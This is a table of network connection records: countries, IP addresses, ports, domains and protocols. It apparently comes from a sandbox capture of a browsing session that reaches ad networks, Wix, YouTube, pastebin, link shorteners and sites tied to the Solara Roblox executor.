| US | 8.8.8.8:53 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | udp |
| GB | 142.250.200.14:443 | youtube-ui.l.google.com | tcp |
| US | 8.8.8.8:53 | powerupgaming.co.uk | udp |
| US | 8.8.8.8:53 | powerupgaming.co.uk | udp |
| GB | 192.250.239.109:443 | powerupgaming.co.uk | tcp |
| US | 8.8.8.8:53 | powerupgaming.co.uk | udp |
| US | 8.8.8.8:53 | 109.239.250.192.in-addr.arpa | udp |
| GB | 192.250.239.109:443 | powerupgaming.co.uk | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| US | 216.239.32.36:443 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | 36.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www3.l.google.com | udp |
| GB | 216.58.204.66:443 | googleads.g.doubleclick.net | tcp |
| GB | 216.58.204.66:443 | googleads.g.doubleclick.net | tcp |
| GB | 216.58.204.66:443 | googleads.g.doubleclick.net | tcp |
| GB | 216.58.204.66:443 | googleads.g.doubleclick.net | tcp |
| GB | 172.217.169.34:443 | ep1.adtrafficquality.google | tcp |
| GB | 216.58.204.66:443 | googleads.g.doubleclick.net | udp |
| GB | 172.217.169.34:443 | ep1.adtrafficquality.google | udp |
| GB | 172.217.169.1:443 | ep2.adtrafficquality.google | tcp |
| GB | 172.217.169.1:443 | ep2.adtrafficquality.google | udp |
| GB | 172.217.169.36:443 | www.google.com | tcp |
| GB | 172.217.169.36:443 | www.google.com | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| GB | 216.58.204.65:443 | tpc.googlesyndication.com | tcp |
| GB | 216.58.204.65:443 | tpc.googlesyndication.com | tcp |
| GB | 216.58.204.65:443 | tpc.googlesyndication.com | tcp |
| GB | 172.217.169.34:443 | ep1.adtrafficquality.google | tcp |
| US | 8.8.8.8:53 | partner.googleadservices.com | udp |
| US | 8.8.8.8:53 | syndicatedsearch.goog | udp |
| US | 8.8.8.8:53 | partner.googleadservices.com | udp |
| GB | 216.58.201.110:443 | syndicatedsearch.goog | tcp |
| GB | 216.58.201.110:443 | syndicatedsearch.goog | tcp |
| US | 8.8.8.8:53 | syndicatedsearch.goog | udp |
| GB | 216.58.204.65:443 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | syndicatedsearch.goog | udp |
| GB | 142.250.187.194:443 | partner.googleadservices.com | tcp |
| GB | 216.58.201.110:443 | syndicatedsearch.goog | udp |
| GB | 142.250.187.194:443 | partner.googleadservices.com | udp |
| US | 8.8.8.8:53 | cse.google.com | udp |
| GB | 142.250.180.14:443 | cse.google.com | tcp |
| US | 8.8.8.8:53 | cse.google.com | udp |
| US | 8.8.8.8:53 | 194.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cse.google.com | udp |
| US | 8.8.8.8:53 | frog.wix.com | udp |
| US | 8.8.8.8:53 | bi-flogger-alb-ext-343643057.us-east-1.elb.amazonaws.com | udp |
| GB | 142.250.180.14:443 | cse.google.com | udp |
| US | 8.8.8.8:53 | bi-flogger-alb-ext-343643057.us-east-1.elb.amazonaws.com | udp |
| US | 8.8.8.8:53 | afs.googleusercontent.com | udp |
| US | 8.8.8.8:53 | clients1.google.com | udp |
| US | 8.8.8.8:53 | 14.180.250.142.in-addr.arpa | udp |
| GB | 142.250.200.1:443 | afs.googleusercontent.com | tcp |
| GB | 142.250.200.1:443 | afs.googleusercontent.com | tcp |
| GB | 142.250.200.1:443 | afs.googleusercontent.com | udp |
| GB | 172.217.169.34:443 | ep1.adtrafficquality.google | tcp |
| GB | 172.217.169.34:443 | ep1.adtrafficquality.google | udp |
| GB | 172.217.169.1:443 | ep2.adtrafficquality.google | tcp |
| US | 8.8.8.8:53 | clients.l.google.com | udp |
| GB | 142.250.178.14:443 | clients.l.google.com | tcp |
| GB | 142.250.178.14:443 | clients.l.google.com | udp |
| US | 8.8.8.8:53 | clients.l.google.com | udp |
| GB | 172.217.169.1:443 | ep2.adtrafficquality.google | udp |
| GB | 216.58.204.65:443 | tpc.googlesyndication.com | tcp |
| GB | 216.58.204.65:443 | tpc.googlesyndication.com | udp |
| DE | 167.235.14.29:443 | solaraexecutor.com | tcp |
| US | 34.149.87.45:443 | td-ccm-neg-87-45.wixdns.net | udp |
| US | 8.8.8.8:53 | wix.salesdish.com | udp |
| US | 47.88.111.42:443 | wix.salesdish.com | tcp |
| US | 8.8.8.8:53 | antools-wix.oss-us-west-1.aliyuncs.com | udp |
| US | 8.8.8.8:53 | antools-wix.oss-us-west-1.aliyuncs.com | udp |
| US | 8.8.8.8:53 | 42.111.88.47.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gateway.salesdish.com | udp |
| GB | 142.250.178.14:443 | clients.l.google.com | tcp |
| US | 47.89.217.158:443 | gateway.salesdish.com | tcp |
| US | 8.8.8.8:53 | gateway.salesdish.com | udp |
| US | 8.8.8.8:53 | solaraexecutor.com | udp |
| US | 8.8.8.8:53 | gateway.salesdish.com | udp |
| US | 8.8.8.8:53 | startertemplatecloud.com | udp |
| US | 104.26.1.66:443 | startertemplatecloud.com | tcp |
| US | 8.8.8.8:53 | startertemplatecloud.com | udp |
| US | 8.8.8.8:53 | startertemplatecloud.com | udp |
| US | 8.8.8.8:53 | 158.217.89.47.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.1.26.104.in-addr.arpa | udp |
| CA | 149.56.240.129:443 | s4.histats.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.200.1:443 | afs.googleusercontent.com | tcp |
| GB | 142.250.180.14:443 | cse.google.com | tcp |
| GB | 142.250.178.14:443 | clients.l.google.com | udp |
| US | 34.49.229.81:443 | td-static-34-49-229-81.parastorage.com | udp |
| GB | 142.250.187.206:443 | youtube-ui.l.google.com | udp |
| US | 8.8.8.8:53 | td-ccm-neg-87-45.wixdns.net | udp |
| US | 8.8.8.8:53 | td-ccm-neg-87-45.wixdns.net | udp |
| US | 104.22.23.72:443 | cdn.linkvertise.com | tcp |
| US | 172.67.31.186:443 | cdn.linkvertise.com | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| GB | 142.250.200.3:443 | www.google.co.uk | tcp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 8.8.8.8:53 | am-api.taboola.com | udp |
| US | 8.8.8.8:53 | tls13.taboola.map.fastly.net | udp |
| US | 151.101.129.44:443 | tls13.taboola.map.fastly.net | tcp |
| US | 104.22.22.72:443 | cdn.linkvertise.com | tcp |
| US | 8.8.8.8:53 | images.taboola.com | udp |
| US | 8.8.8.8:53 | tls13.taboola.map.fastly.net | udp |
| US | 8.8.8.8:53 | 72.23.22.104.in-addr.arpa | udp |
| US | 151.101.1.44:443 | images.taboola.com | tcp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| GB | 142.250.200.3:443 | www.google.co.uk | udp |
| US | 104.22.22.72:443 | cdn.linkvertise.com | udp |
| US | 8.8.8.8:53 | b.clarity.ms | udp |
| US | 8.8.8.8:53 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | udp |
| US | 4.153.129.168:443 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | tcp |
| US | 8.8.8.8:53 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | 44.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | b.clarity.ms | udp |
| US | 8.8.8.8:53 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | udp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | tcp |
| US | 8.8.8.8:53 | maxst.icons8.com | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 104.18.10.207:443 | stackpath.bootstrapcdn.com | tcp |
| US | 8.8.8.8:53 | p.typekit.net | udp |
| US | 8.8.8.8:53 | js.chargebee.com | udp |
| US | 8.8.8.8:53 | contextual.media.net | udp |
| US | 8.8.8.8:53 | 1454623486.rsc.cdn77.org | udp |
| NL | 195.181.172.5:443 | 1454623486.rsc.cdn77.org | tcp |
| GB | 2.18.190.136:443 | p.typekit.net | tcp |
| US | 8.8.8.8:53 | a1874.dscg1.akamai.net | udp |
| NL | 18.239.18.124:443 | js.chargebee.com | tcp |
| US | 8.8.8.8:53 | js.chargebee.com | udp |
| GB | 184.25.192.27:443 | contextual.media.net | tcp |
| US | 8.8.8.8:53 | contextual.media.net | udp |
| US | 8.8.8.8:53 | 1454623486.rsc.cdn77.org | udp |
| US | 8.8.8.8:53 | a1874.dscg1.akamai.net | udp |
| US | 8.8.8.8:53 | contextual.media.net | udp |
| US | 8.8.8.8:53 | js.chargebee.com | udp |
| US | 8.8.8.8:53 | obseu.bizseasky.com | udp |
| US | 8.8.8.8:53 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | udp |
| IT | 95.110.204.9:443 | cdn.exmarketplace.com | tcp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | use.typekit.net | udp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 104.18.10.207:443 | stackpath.bootstrapcdn.com | tcp |
| US | 8.8.8.8:53 | obseu.bizseasky.com | udp |
| NL | 18.239.18.111:443 | js.chargebee.com | tcp |
| US | 8.8.8.8:53 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | udp |
| GB | 2.18.190.147:443 | use.typekit.net | tcp |
| GB | 142.250.187.226:443 | securepubads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | a1988.dscg1.akamai.net | udp |
| US | 8.8.8.8:53 | obseu.bizseasky.com | udp |
| US | 8.8.8.8:53 | 124.18.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.25.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.clarity.ms | udp |
| US | 104.26.12.205:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | s-part-0036.t-0009.t-msedge.net | udp |
| US | 8.8.8.8:53 | euob.bizseasky.com | udp |
| US | 8.8.8.8:53 | s-part-0036.t-0009.t-msedge.net | udp |
| US | 8.8.8.8:53 | euob.bizseasky.com | udp |
| NL | 18.239.69.122:443 | euob.bizseasky.com | tcp |
| GB | 184.25.192.27:443 | contextual.media.net | tcp |
| US | 13.107.246.64:443 | s-part-0036.t-0009.t-msedge.net | tcp |
| GB | 172.217.169.34:443 | ep1.adtrafficquality.google | tcp |
| US | 8.8.8.8:53 | c.clarity.ms | udp |
| US | 8.8.8.8:53 | b.clarity.ms | udp |
| US | 8.8.8.8:53 | c-msn-com-nsatc.trafficmanager.net | udp |
| US | 8.8.8.8:53 | api.taboola.com | udp |
| US | 8.8.8.8:53 | c-msn-com-nsatc.trafficmanager.net | udp |
| US | 8.8.8.8:53 | tls13.taboola.map.fastly.net | udp |
| US | 151.101.193.44:443 | tls13.taboola.map.fastly.net | tcp |
| GB | 172.217.169.34:443 | ep1.adtrafficquality.google | udp |
| GB | 172.217.169.1:443 | ep2.adtrafficquality.google | tcp |
| US | 8.8.8.8:53 | tls13.taboola.map.fastly.net | udp |
| IE | 13.74.129.1:443 | c-msn-com-nsatc.trafficmanager.net | tcp |
| US | 8.8.8.8:53 | 122.69.239.18.in-addr.arpa | udp |
| GB | 172.217.169.1:443 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | c.bing.com | udp |
| US | 8.8.8.8:53 | dual-a-0034.a-msedge.net | udp |
| US | 13.107.21.237:443 | dual-a-0034.a-msedge.net | tcp |
| US | 8.8.8.8:53 | dual-a-0034.a-msedge.net | udp |
| US | 8.8.8.8:53 | am-api.taboola.com | udp |
| US | 8.8.8.8:53 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | browser.sentry-cdn.com | udp |
| US | 151.101.194.217:443 | browser.sentry-cdn.com | tcp |
| US | 8.8.8.8:53 | browser.sentry-cdn.com | udp |
| US | 8.8.8.8:53 | browser.sentry-cdn.com | udp |
| US | 8.8.8.8:53 | 217.194.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | udp |
| US | 104.22.22.72:443 | cdn.linkvertise.com | udp |
| US | 8.8.8.8:53 | images.taboola.com | udp |
| US | 8.8.8.8:53 | tls13.taboola.map.fastly.net | udp |
| US | 8.8.8.8:53 | b.clarity.ms | udp |
| US | 104.22.22.72:443 | cdn.linkvertise.com | udp |
| US | 8.8.8.8:53 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | udp |
| GB | 142.250.200.14:443 | youtube-ui.l.google.com | udp |
| US | 8.8.8.8:53 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | udp |
| GB | 216.58.204.66:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | duplexer.wix.com | udp |
| US | 8.8.8.8:53 | duplexer.uw2-edt-1.sphera.tools | udp |
| US | 54.149.248.109:443 | duplexer.wix.com | tcp |
| US | 8.8.8.8:53 | duplexer.uw2-edt-1.sphera.tools | udp |
| US | 54.149.248.109:443 | duplexer.wix.com | tcp |
| US | 8.8.8.8:53 | 109.248.149.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | b.clarity.ms | udp |
| US | 8.8.8.8:53 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | tinyurl.com | udp |
| US | 104.17.112.233:443 | tinyurl.com | tcp |
| US | 104.17.112.233:443 | tinyurl.com | tcp |
| US | 8.8.8.8:53 | tinyurl.com | udp |
| US | 8.8.8.8:53 | tinyurl.com | udp |
| US | 104.17.112.233:443 | tinyurl.com | udp |
| US | 8.8.8.8:53 | 1c143a05.solaraweb-alj.pages.dev | udp |
| US | 172.66.44.59:443 | 1c143a05.solaraweb-alj.pages.dev | tcp |
| US | 8.8.8.8:53 | 1c143a05.solaraweb-alj.pages.dev | udp |
| US | 8.8.8.8:53 | 1c143a05.solaraweb-alj.pages.dev | udp |
| US | 172.66.44.59:443 | 1c143a05.solaraweb-alj.pages.dev | udp |
| US | 8.8.8.8:53 | obseu.bizseasky.com | udp |
| US | 8.8.8.8:53 | obseu.bizseasky.com | udp |
| US | 8.8.8.8:53 | 233.112.17.104.in-addr.arpa | udp |
| US | 104.21.93.27:443 | getsolara.dev | tcp |
| N/A | 127.0.0.1:6463 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 99ab5d9c.solaraweb-alj.pages.dev | udp |
| US | 172.66.47.197:443 | 99ab5d9c.solaraweb-alj.pages.dev | tcp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.47.66.172.in-addr.arpa | udp |
| US | 1.1.1.1:53 | getsolara.dev | udp |
| US | 172.67.203.125:443 | getsolara.dev | tcp |
| US | 1.1.1.1:53 | 125.203.67.172.in-addr.arpa | udp |
| US | 1.1.1.1:53 | clientsettings.roblox.com | udp |
| GB | 128.116.119.4:443 | clientsettings.roblox.com | tcp |
| US | 1.1.1.1:53 | 4.119.116.128.in-addr.arpa | udp |
| US | 1.1.1.1:53 | www.nodejs.org | udp |
| US | 104.20.22.46:443 | www.nodejs.org | tcp |
| US | 1.1.1.1:53 | nodejs.org | udp |
| US | 104.20.22.46:443 | nodejs.org | tcp |
| US | 1.1.1.1:53 | www.youtube.com | udp |
| US | 1.1.1.1:53 | youtube-ui.l.google.com | udp |
| GB | 172.217.169.78:443 | youtube-ui.l.google.com | udp |
| US | 1.1.1.1:53 | youtube-ui.l.google.com | udp |
| US | 1.1.1.1:53 | 46.22.20.104.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 78.169.217.172.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 78.169.217.172.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 1.0.0.1.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 1.0.0.1.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 233.38.18.104.in-addr.arpa | udp |
| US | 34.149.206.255:443 | glb-editor.wix.com | udp |
| AU | 1.0.0.1:53 | static.wixstatic.com | udp |
| GB | 108.156.46.40:443 | static.wixstatic.com | udp |
| AU | 1.0.0.1:53 | d1cq301dpr7fww.cloudfront.net | udp |
| AU | 1.0.0.1:53 | d1cq301dpr7fww.cloudfront.net | udp |
| AU | 1.0.0.1:53 | pagead2.googlesyndication.com | udp |
| AU | 1.0.0.1:53 | pagead2.googlesyndication.com | udp |
| AU | 1.0.0.1:53 | pagead2.googlesyndication.com | udp |
| AU | 1.0.0.1:53 | 226.212.58.216.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 40.46.156.108.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | mboost.me | udp |
| US | 172.67.214.146:443 | mboost.me | tcp |
| AU | 1.0.0.1:53 | mboost.me | udp |
| US | 172.67.151.197:443 | kinarilyhukelpfulin.com | udp |
| AU | 1.0.0.1:53 | mboost.me | udp |
| AU | 1.0.0.1:53 | loaksandtheir.info | udp |
| GB | 54.192.137.68:443 | loaksandtheir.info | tcp |
| AU | 1.0.0.1:53 | loaksandtheir.info | udp |
| AU | 1.0.0.1:53 | loaksandtheir.info | udp |
| AU | 1.0.0.1:53 | 68.137.192.54.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 146.214.67.172.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | sentry-next.wixpress.com | udp |
| AU | 1.0.0.1:53 | frog.wix.com | udp |
| AU | 1.0.0.1:53 | bi-flogger-alb-ext-343643057.us-east-1.elb.amazonaws.com | udp |
| US | 18.214.201.130:443 | sentry-next.wixpress.com | tcp |
| AU | 1.0.0.1:53 | sentry-ssl-462500017.us-east-1.elb.amazonaws.com | udp |
| AU | 1.0.0.1:53 | sentry-ssl-462500017.us-east-1.elb.amazonaws.com | udp |
| AU | 1.0.0.1:53 | bi-flogger-alb-ext-343643057.us-east-1.elb.amazonaws.com | udp |
| AU | 1.0.0.1:53 | tastytabapp.com | udp |
| US | 64.225.3.138:443 | tastytabapp.com | tcp |
| AU | 1.0.0.1:53 | tastytabapp.com | udp |
| AU | 1.0.0.1:53 | tastytabapp.com | udp |
| AU | 1.0.0.1:53 | fonts.gstatic.com | udp |
| AU | 1.0.0.1:53 | fonts.googleapis.com | udp |
| AU | 1.0.0.1:53 | 130.201.214.18.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 138.3.225.64.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | fonts.gstatic.com | udp |
| AU | 1.0.0.1:53 | fonts.googleapis.com | udp |
| AU | 1.0.0.1:53 | fonts.gstatic.com | udp |
| AU | 1.0.0.1:53 | fonts.googleapis.com | udp |
| AU | 1.0.0.1:53 | www.googletagmanager.com | udp |
| AU | 1.0.0.1:53 | www.googletagmanager.com | udp |
| AU | 1.0.0.1:53 | www.googletagmanager.com | udp |
| AU | 1.0.0.1:53 | obseu.bizseasky.com | udp |
| AU | 1.0.0.1:53 | obseu.bizseasky.com | udp |
| AU | 1.0.0.1:53 | obseu.bizseasky.com | udp |
| AU | 1.0.0.1:53 | www.google.com | udp |
| GB | 216.58.201.100:443 | www.google.com | tcp |
| AU | 1.0.0.1:53 | www.google.com | udp |
| AU | 1.0.0.1:53 | www.google.com | udp |
| GB | 216.58.201.100:443 | www.google.com | udp |
| AU | 1.0.0.1:53 | 67.169.217.172.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 232.16.217.172.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 100.201.58.216.in-addr.arpa | udp |
| GB | 216.58.204.66:443 | googleads.g.doubleclick.net | udp |
| AU | 1.0.0.1:53 | addons.mozilla.org | udp |
| US | 151.101.65.91:443 | addons.mozilla.org | tcp |
| AU | 1.0.0.1:53 | addons.mozilla.org | udp |
| AU | 1.0.0.1:53 | addons.mozilla.org | udp |
| AU | 1.0.0.1:53 | 91.65.101.151.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | www.google-analytics.com | udp |
| AU | 1.0.0.1:53 | www.google-analytics.com | udp |
| AU | 1.0.0.1:53 | www.google-analytics.com | udp |
| AU | 1.0.0.1:53 | region1.google-analytics.com | udp |
| AU | 1.0.0.1:53 | region1.google-analytics.com | udp |
| AU | 1.0.0.1:53 | region1.google-analytics.com | udp |
| AU | 1.0.0.1:53 | 99ab5d9c.solaraweb-alj.pages.dev | udp |
| US | 172.66.44.59:443 | 99ab5d9c.solaraweb-alj.pages.dev | tcp |
| US | 216.239.34.36:443 | region1.google-analytics.com | tcp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| AU | 1.0.0.1:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| GB | 128.116.119.4:443 | clientsettings.roblox.com | tcp |
| AU | 1.0.0.1:53 | 24.19.67.172.in-addr.arpa | udp |
| US | 151.101.65.91:443 | addons.mozilla.org | tcp |
| AU | 1.0.0.1:53 | sourceforge.net | udp |
| AU | 1.0.0.1:53 | sourceforge.net | udp |
| US | 104.18.37.111:443 | sourceforge.net | udp |
| AU | 1.0.0.1:53 | sourceforge.net | udp |
| US | 104.18.95.41:443 | challenges.cloudflare.com | udp |
| AU | 1.0.0.1:53 | challenges.cloudflare.com | udp |
| US | 104.18.95.41:443 | challenges.cloudflare.com | udp |
| AU | 1.0.0.1:53 | challenges.cloudflare.com | udp |
| US | 104.18.94.41:443 | challenges.cloudflare.com | tcp |
| AU | 1.0.0.1:53 | challenges.cloudflare.com | udp |
| AU | 1.0.0.1:53 | youtube-ui.l.google.com | udp |
| AU | 1.0.0.1:53 | 41.94.18.104.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | loaksandtheir.info | udp |
| AU | 1.0.0.1:53 | loaksandtheir.info | udp |
| US | 64.225.3.138:80 | tastytabapp.com | tcp |
| AU | 1.0.0.1:53 | support.mozilla.org | udp |
| AU | 1.0.0.1:53 | us-west1.prod.sumo.prod.webservices.mozgcp.net | udp |
| AU | 1.0.0.1:53 | tastytabapp.com | udp |
| AU | 1.0.0.1:53 | us-west1.prod.sumo.prod.webservices.mozgcp.net | udp |
| US | 64.225.3.138:80 | tastytabapp.com | tcp |
| US | 64.225.3.138:80 | tastytabapp.com | tcp |
| AU | 1.0.0.1:53 | thankyou-page-videos.s3.amazonaws.com | udp |
| US | 3.5.10.110:443 | thankyou-page-videos.s3.amazonaws.com | tcp |
| AU | 1.0.0.1:53 | s3-w.us-east-1.amazonaws.com | udp |
| AU | 1.0.0.1:53 | realiukzemydr.info | udp |
| AU | 1.0.0.1:53 | ad.propellerads.com | udp |
| AU | 1.0.0.1:53 | s3-w.us-east-1.amazonaws.com | udp |
| AU | 1.0.0.1:53 | ad.propellerads.com | udp |
| US | 172.67.200.233:443 | realiukzemydr.info | tcp |
| AU | 1.0.0.1:53 | realiukzemydr.info | udp |
| AU | 1.0.0.1:53 | ad.propellerads.com | udp |
| AU | 1.0.0.1:53 | realiukzemydr.info | udp |
| US | 172.67.200.233:443 | realiukzemydr.info | udp |
| NL | 139.45.195.6:443 | ad.propellerads.com | tcp |
| AU | 1.0.0.1:53 | 233.200.67.172.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 110.10.5.3.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 6.195.45.139.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | b.clarity.ms | udp |
| US | 4.153.129.168:443 | b.clarity.ms | tcp |
| AU | 1.0.0.1:53 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | udp |
| AU | 1.0.0.1:53 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | udp |
| US | 172.67.214.146:443 | mboost.me | udp |
| AU | 1.0.0.1:53 | cdn.wearedevs.net | udp |
| AU | 1.0.0.1:53 | resources.infolinks.com | udp |
| AU | 1.0.0.1:53 | api.mboost.me | udp |
| US | 104.26.7.147:443 | cdn.wearedevs.net | tcp |
| AU | 1.0.0.1:53 | cdn.wearedevs.net | udp |
| US | 172.67.214.146:443 | api.mboost.me | tcp |
| AU | 1.0.0.1:53 | api.mboost.me | udp |
| US | 172.66.42.247:443 | resources.infolinks.com | tcp |
| AU | 1.0.0.1:53 | resources.infolinks.com | udp |
| AU | 1.0.0.1:53 | cdn.wearedevs.net | udp |
| AU | 1.0.0.1:53 | resources.infolinks.com | udp |
| AU | 1.0.0.1:53 | api.mboost.me | udp |
| US | 104.26.7.147:443 | cdn.wearedevs.net | udp |
| US | 172.67.214.146:443 | api.mboost.me | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | tcp |
| AU | 1.0.0.1:53 | router.infolinks.com | udp |
| US | 172.66.42.247:443 | router.infolinks.com | tcp |
| US | 172.66.42.247:443 | router.infolinks.com | tcp |
| US | 172.66.42.247:443 | router.infolinks.com | tcp |
| AU | 1.0.0.1:53 | router.infolinks.com | udp |
| AU | 1.0.0.1:53 | router.infolinks.com | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| AU | 1.0.0.1:53 | rt3065.infolinks.com | udp |
| US | 172.66.42.247:443 | rt3065.infolinks.com | tcp |
| AU | 1.0.0.1:53 | rt3065.infolinks.com | udp |
| AU | 1.0.0.1:53 | 147.7.26.104.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 247.42.66.172.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | rt3065.infolinks.com | udp |
| AU | 1.0.0.1:53 | imasdk.googleapis.com | udp |
| AU | 1.0.0.1:53 | imasdk.googleapis.com | udp |
| AU | 1.0.0.1:53 | imasdk.googleapis.com | udp |
| US | 172.66.42.247:443 | rt3065.infolinks.com | tcp |
| AU | 1.0.0.1:53 | securepubads.g.doubleclick.net | udp |
| GB | 216.58.204.66:443 | securepubads.g.doubleclick.net | tcp |
| AU | 1.0.0.1:53 | securepubads.g.doubleclick.net | udp |
| AU | 1.0.0.1:53 | securepubads.g.doubleclick.net | udp |
| GB | 216.58.204.66:443 | securepubads.g.doubleclick.net | udp |
| AU | 1.0.0.1:53 | 10.200.250.142.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | yt3.ggpht.com | udp |
| GB | 172.217.169.65:443 | yt3.ggpht.com | tcp |
| AU | 1.0.0.1:53 | photos-ugc.l.googleusercontent.com | udp |
| GB | 142.250.200.14:443 | youtube-ui.l.google.com | udp |
| AU | 1.0.0.1:53 | consent.youtube.com | udp |
| AU | 1.0.0.1:53 | photos-ugc.l.googleusercontent.com | udp |
| GB | 216.58.201.110:443 | consent.youtube.com | tcp |
| AU | 1.0.0.1:53 | consent.youtube.com | udp |
| AU | 1.0.0.1:53 | 65.169.217.172.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | consent.youtube.com | udp |
| GB | 216.58.201.110:443 | consent.youtube.com | udp |
| AU | 1.0.0.1:53 | www.gstatic.com | udp |
| AU | 1.0.0.1:53 | www.gstatic.com | udp |
| AU | 1.0.0.1:53 | www.gstatic.com | udp |
| GB | 216.58.201.100:443 | www.google.com | tcp |
| GB | 216.58.201.100:443 | www.google.com | udp |
| AU | 1.0.0.1:53 | 35.200.250.142.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | youtu.be | udp |
| GB | 216.58.212.206:443 | youtu.be | tcp |
| AU | 1.0.0.1:53 | youtu.be | udp |
| AU | 1.0.0.1:53 | youtu.be | udp |
| GB | 216.58.212.206:443 | youtu.be | udp |
| AU | 1.0.0.1:53 | i.ytimg.com | udp |
| AU | 1.0.0.1:53 | rr5---sn-aigzrnsl.googlevideo.com | udp |
| GB | 216.58.204.86:443 | i.ytimg.com | tcp |
| AU | 1.0.0.1:53 | i.ytimg.com | udp |
| GB | 216.58.204.86:443 | i.ytimg.com | tcp |
| GB | 74.125.168.234:443 | rr5---sn-aigzrnsl.googlevideo.com | tcp |
| AU | 1.0.0.1:53 | rr5.sn-aigzrnsl.googlevideo.com | udp |
| GB | 74.125.168.234:443 | rr5.sn-aigzrnsl.googlevideo.com | tcp |
| AU | 1.0.0.1:53 | i.ytimg.com | udp |
| AU | 1.0.0.1:53 | rr5.sn-aigzrnsl.googlevideo.com | udp |
| GB | 216.58.204.86:443 | i.ytimg.com | udp |
| GB | 74.125.168.234:443 | rr5.sn-aigzrnsl.googlevideo.com | udp |
| AU | 1.0.0.1:53 | 206.212.58.216.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 86.204.58.216.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 234.168.125.74.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | rr2---sn-aigl6nsr.googlevideo.com | udp |
| AU | 1.0.0.1:53 | tpc.googlesyndication.com | udp |
| AU | 1.0.0.1:53 | rr2---sn-aigl6ned.googlevideo.com | udp |
| GB | 74.125.105.135:443 | rr2---sn-aigl6nsr.googlevideo.com | tcp |
| AU | 1.0.0.1:53 | rr2.sn-aigl6nsr.googlevideo.com | udp |
| GB | 142.250.179.225:443 | tpc.googlesyndication.com | tcp |
